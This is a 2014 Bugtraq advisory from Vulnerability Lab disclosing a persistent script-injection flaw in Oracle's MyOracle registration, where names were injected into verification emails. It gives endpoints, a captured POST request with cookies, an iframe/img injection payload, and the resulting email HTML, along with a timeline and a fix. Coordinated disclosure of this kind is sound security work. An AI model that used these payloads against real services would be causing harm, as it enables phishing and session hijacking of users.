[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Oracle Corporation MyOracle - Persistent Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx
- Subject: Oracle Corporation MyOracle - Persistent Vulnerability
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Thu, 18 Sep 2014 13:29:37 +0200
Document Title:
===============
Oracle Corporation MyOracle - Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1261
Oracle Security ID (Team Tracking ID): admin@xxxxxxxxxxxxxxxxxxxxx-001:2014
http://vulnerability-db.com/magazine/articles/2014/09/17/oracle-corporation-fixed-vulnerability-myoracle-online-service-application
Release Date:
=============
2014-09-17
Vulnerability Laboratory ID (VL-ID):
====================================
1261
Common Vulnerability Scoring System:
====================================
3.9
Product & Service Introduction:
===============================
Oracle Corporation is an American multinational computer technology corporation
headquartered in Redwood City, California, United States.
The company specializes in developing and marketing computer hardware systems
and enterprise software products – particularly its own brands
of database management systems. Oracle is the second-largest software maker by
revenue, after Microsoft. The company also builds tools for
database development and systems of middle-tier software, enterprise resource
planning (ERP) software, customer relationship management (CRM)
software and supply chain management (SCM) software. Larry Ellison, a
co-founder of Oracle, has served as Oracle`s CEO throughout its history.
He also served as the Chairman of the Board until his replacement by Jeffrey O.
Henley in 2004. On August 22, 2008, the Associated Press
ranked Ellison as the top-paid chief executive in the world.
(Copy of the Homepage: http://en.wikipedia.org/wiki/Oracle_Corporation )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent
vulnerability in the official Oracle Corporation `MyOracle` service
web-application.
Vulnerability Disclosure Timeline:
==================================
2014-04-28: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-04-30: Vendor Notification (Oracle Sec Alert Security Team)
2014-05-03: Vendor Response/Feedback (Oracle Sec Alert Security Team)
2014-09-01: Vendor Fix/Patch (Oracle Developer Team - Acknowledgments 2014
October CPU Advisory)
2014-09-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A filter and persistent input validation mail encoding web vulnerability has
been discovered in the official Oracle Corporation `MyOracle` service
web-application.
The vulnerability allows to bypass the regular web/system validation to inject
own script codes in outgoing emails of the account system mail server service.
The vulnerability is located in the name values of the my-oracle `registration`
module. Remote attackers are able to inject in the first and lastname input
fields of the
registration formular own script codes via POST method request. The injected
script code activates the account mail service notification which returns with
the persistent
code in the myoracle token activation site. The issue impact a critical risk
because an attacker is able to inject own tokens or can manipulate the full
mail body context.
Further send notification mails by the myoracle service can also be affected by
the issue. The encoding of the server does not recognize outgoing service mails
which
results in the persistent issue in outgoing emails. The injection point is a
profile values update or directly the remote registration itself. The security
risk of the
persistent mail encoding and filter web vulnerability is estimated as medium
with a cvss (common vulnerability scoring system) count of 3.9.
Exploitation of the vulnerability requires low user interaction and no
privileged application user account. Successful exploitation results in
persistent session hijacking
attacks, unauthorized external redirects to malicious sources and persistent
manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Service(s):
[+] MyOracle
Vulnerable Module(s):
[+] Registration (exp.)
Vulnerable Parameter(s):
[+] Profile name values (firstname & lastname
...)
[Sender]:
[+] oracle-acct_ww@xxxxxxxxxx
[Receiver]:
[+] admin@xxxxxxxxxxxxxxxxx &
bkm@xxxxxxxxxxxxxxxxx
Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote
attackers with low user interaction and without privileged application user
account.
For security demonstration or to reproduce the persistent mail encoding web
vulnerability follow the provided information and steps below to continue.
Sender Mailbox - Main Oracle Server
oracle-acct_ww@xxxxxxxxxx
Affected Mailbox - Receiver/Victim
admin@xxxxxxxxxxxxxxxxx
bkm@xxxxxxxxxxxxxxxxx
Inject via Profile (POST)
https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx?nextURL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3
Inject via Registration (POST)
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0
After Inject (REDIRECT OPTIONS)
https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0
-- PoC Session Logs [POST] ---
20:16:31.280[4105ms][total 4105ms] Status: 302[Moved Temporarily]
POST
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des
Inhalts[720] Mime Type[text/html]
Request Header:
Host[myprofile.oracle.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101
Firefox/28.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0]
Cookie[optimizelySegments=%7B%22174383146%22%3A%22ff%22%2C%22174203172%22%3A%22false%22%2C%22173164270%22%3A%22direct%22%7D;
optimizelyEndUserId=oeu1398447211204r0.7026125166698021;
optimizelyBuckets=%7B%7D; s_cc=true; s_fid=343B504EB719CF63-1174BEDEC7EE3C0B;
s_nr=1398449779754;
gpw_e24=https%3A%2F%2Fmyprofile.oracle.com%2FEndUser%2Ffaces%2Fprofile%2FcreateUser.jspx%3FnextURL%3Dhttps%253A%252F%252Flogin.oracle.com%252Fpls%252Forasso%252Forasso.wwsso_app_admin.ls_login%253FSite2pstoreToken%253Dv1.2%257E656BF073%257E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0;
s_sq=oracleglobal%3D%2526pid%253Dprofile%25253Aen-us%25253Acreate-user%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BTrPage._autoSubmit('f1'%25252C'usr_srv_otn'%25252Cevent%25252C1)%25253Breturntrue%25253B%25257D%2526oidt%253D2%2526ot%253DCHECKBOX;
p_org_id=1001; p_lang=US;
p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3;
atgPlatoStop=1;
BreadCrumb=%257BlevelName%253A%253A%253Cspan%2520style%253D%2522color%253ARED%253B%2520font-weight%253Abold%253B%2520font-size%253A11px%253B%2522%253EOracle%253C/span%253E%2520University%2520Home%2523%2523levelUrl%253A%253A/pls/web_prod-plq-dad/db_pages.getpage%253Fpage_id%253D3%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D;
JSESSIONID=GBTGThlDQtGWmKXcVyTT5SF2LNBpRNGJ65Ls1KTZSjRf5rXvxm8L!1006513418!189473844;
BIGipServermktap_myprofile_cache_pool=1729139341.26910.0000;
notice_preferences=2:cb8350a2759273dccf1e483791e6f8fd;
s_eVar21=CLD-hp-panel-build-business-intelligence]
Connection[keep-alive]
POST-Daten:
ops[Bitte+w%C3%A4hlen+Sie+...]
drm[Sie+m%C3%BCssen+%7B0%7D+eingeben.]
drsm[Sie+m%C3%BCssen+f%C3%BCr+%7B0%7D+mindestens+ein+Element+ausw%C3%A4hlen]
err[FEHLER]
reqd[Erforderliches+Feld.]
lqws[https%3A%2F%2Floqate.oracle.com%2FLoqate%2FLoqate]
unamefield[admin%40evolution-sec.com]
passwd1[Keymaster148%21]
passwd2[Keymaster148%21]
givenname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
middlename[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
sn[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
usr_jtitle[pentester]
usr_ctry[41]
usr_state[6]
usr_cty[Kassel]
companyname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
usr_line1[bremerstrasse+1337]
usr_line2[]
usr_postal_code[34125]
telephonenumber[573246234]
usr_srv_otn[t]
usr_srv_cio[t]
usr_nsl_psn[t]
org.apache.myfaces.trinidad.faces.FORM[f1]
_noJavaScript[false]
javax.faces.ViewState[%2118erzf7qoc]
event[]
source[cb1]
partial[]
Response Header:
Location[https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0]
X-Frame-Options[sameorigin]
Content-Type[text/html]
Content-Language[en]
Content-Encoding[gzip]
Server[Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0
(N;ecid=122956956898568077,0)]
Content-Length[720]
Vary[Accept-Encoding]
Date[Fri, 25 Apr 2014 18:16:45 GMT]
Connection[keep-alive]
PoC: Exploitcode in Mail
<html><head>
<title>Bitte verifizieren Sie Ihren Oracle Account</title>
<link rel="important stylesheet"
href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" cellpadding="0" cellspacing="0" border="0"
width="100%"><tbody><tr><td><b>Betreff: </b>Bitte verifizieren Sie Ihren Oracle
Account</td></tr><tr><td><b>Von:
</b>oracle-acct_ww@xxxxxxxxxx</td></tr><tr><td><b>Datum: </b>25.04.2014
20:16</td></tr></tbody></table><table class="header-part2" cellpadding="0"
cellspacing="0" border="0" width="100%"><tbody><tr><td><b>An:
</b>admin@xxxxxxxxxxxxxxxxx</td></tr></tbody></table><br>
<meta http-equiv="Content-Type" content="text/html; "><table cellpadding="0"
cellspacing="0" align="center" border="0" width="640"><tbody><tr><td
style="border-top:#CCCCCC solid 1px; border-right:#CCCCCC solid 1px;
border-bottom:#CCCCCC solid 1px; border-left:#CCCCCC solid 1px;
background-color:#FFFFFF;"><table cellpadding="0" cellspacing="0" border="0"
width="100%"><tbody><tr><td style="background-color:#FF0000;"><a
href="http://www.oracle.com"; target="_blank"><img
src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/302715.gif";
alt="Oracle Corporation" border="0" height="30" hspace="12"
width="123"></a></td></tr><tr><td style="padding:15 15 15 15;
font-family:Arial, Helvetica, sans-serif; font-size:12px; color:#333333;">Sehr
geehrte(r) "><iframe src="http://www.vulnerability-lab.com";>%20"><img
src="x">,<br><br>Bitte klicken Sie zum Bestätigen Ihres Accounts auf den
folgenden Link. Der Link ist 5 Tage lang gültig.<br><br><a
href="https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE";><font
color="#FF0000">Link zur Accountverifizierung</font></a><br><br>Ihr Oracle
Benutzername: admin@xxxxxxxxxxxxxxxxx<br><br><b>Warum Email
Verifizierung?</b><br><li>Schutz Ihrer Daten</li><li>Zugriff auf Oracle
Anwendungen und Websites, die eine Verifizierung erfordern</li><br><br><b>Der
Link zur Accountverifizierung funktioniert nicht?</b><br>Sollte der obige Link
nicht funktionieren können Sie zur Verifizierung Ihrer Emailadresse auch die
folgende URL kopieren und in Ihren Browser
einfügen:<br><br>[https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE]<br><br><b>Sie
wollen eine weitere Bestätigungsemail generieren?</b><br>1) <a
href="https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx";
target="_blank"><font color="#FF0000">Melden Sie sich bei Ihrem Account
an.</font></a><br>2) Klicken Sie auf den Link "Account verifizieren" oder
"Account erneut verifizieren". <br><br>Vielen Dank.<br>Das Oracle Account
Team</font><br><br><hr style="color:#CCCCCC; height:1px;"
/><strong>Richtlinien:</strong><br><font size="1">Bitte bedenken Sie, dass Ihre
Nutzung der Oracle Websites und Services der <a
href="http://www.oracle.com/us/legal/privacy/index.html"; target="_blank"><font
color="#FF0000">Oracle Datenschutzrichtlinie</font></a> und den <a
href="http://www.oracle.com/us/legal/index.html"; target="_blank"><font
color="#FF0000">Servicebedingungen</font></a> unterliegt.<br><br>Verwaltung
Ihres Benutzerkontos: Bitte aktualisieren Sie Ihre Emailadresse bei etwaigen
Änderungen, damit wir Ihnen im Falle von Problemen mit dem Kontozugriff
behilflich sein können. Melden Sie sich dafür zunächst an und klicken Sie
dann auf den Link "Benutzernamen ändern" auf Ihrer Oracle
Account-Seite.<br><br>Aktualisieren der Kommunikationseinstellungen für Ihre
Emailadresse: Bitte melden Sie sich bei Ihrem Account an, um die Einstellungen
der Kommunikationseinstellungen für Ihre Emailadresse zu
aktualisieren.<br><br>Sie haben diese Email erhalten, da vor kurzem für diese
Emailadresse ein Benutzerkonto auf der Oracle Website erstellt wurde. Wenn Sie
in letzter Zeit kein Benutzerkonto auf der Oracle Website erstellt haben, <a
href="http://apex.oracle.com/pls/otn/f?p=42988:3"; target="_blank"><font
color="#FF0000">senden</font></a> Sie uns eine Hilfsanfrage.<br><br>Bei
Zugriffs- oder Anmeldeproblemen <a
href="http://apex.oracle.com/pls/otn/f?p=42988:3:2527260596859682::NO:::";
target="_blank"><font color="#FF0000">klicken Sie bitte
hier</a>.</font><br></tr><tr><td style="padding:15 15 15 15; border-top:#CCCCCC
solid 1px; border-bottom:#CCCCCC solid 1px;"><a
href="http://www.oracle.com/us/corporate/index.html"; target="_blank"><img
src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/196263.gif";
alt="Hardware and Software Engineered to Work Together" width="174"
height="50" border="0" /></a></td></tr><tr><td><table width="100%" border="0"
cellpadding="0" cellspacing="0"><tr><td height="25" style="padding:0 0 0
15;"><font face="Arial, Helvetica, sans-serif" size="1"
color="#333333">Copyright 2014, Oracle. Alle Rechte vorbehalten.</font></td><td
align="right" style="padding:0 15 0 0;"><font face="Arial, Helvetica,
sans-serif" size="1" color="#333333"> <a
href="http://www.oracle.com/de/corporate/contact/index.html";
target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica,
sans-serif"><u>Kontakt</u></font></a> | <a
href="http://www.oracle.com/us/legal/index.html"; target="_blank"><font
color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Rechtliche
Hinweise und Nutzungsbedingungen</u></font></a> | <a
href="http://www.oracle.com/us/legal/privacy/index.html"; target="_blank"><font
color="#FF0000" size="1" face="Arial, Helvetica,
sans-serif"><u>Datenschutz</u></font></a></font></td></tr></table></td></tr></table></td></tr></table></body></html>
</body>
</html>
</iframe></td></tr></tbody></table></td></tr></tbody></table></body></html>
Script Code Payload:
><iframe src="http://www.vulnerability-lab.com";>%20"><img
>src="http://evolution-sec.com/sites/default/files/65-2_0.png";>
Reference(s):
https://myprofile.oracle.com/
https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=x
https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken
Picture(s):
../1.png
../2.png
../3.png
Resource(s):
../Account verifizieren.htm
../Bitte verifizieren Sie Ihren Oracle
Account.html
../Bitte verifizieren Sie Ihren Oracle
Account_poc.html
../poc.txt
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable
first- and last-name input fields in the myoracle application.
Encode stored data of user in the dbms when processing to send service
notifications by the mail info@oracle email to prevent persistent injection
attacks.
Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability in the
myoracle account system web-server is estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential
or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor
licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx -
research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com
- magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All
pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@xxxxxxxxxxxxxxxxxxxxx or
research@xxxxxxxxxxxxxxxxxxxxx) to get a permission.
Copyright © 2014 | Vulnerability Laboratory
[Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx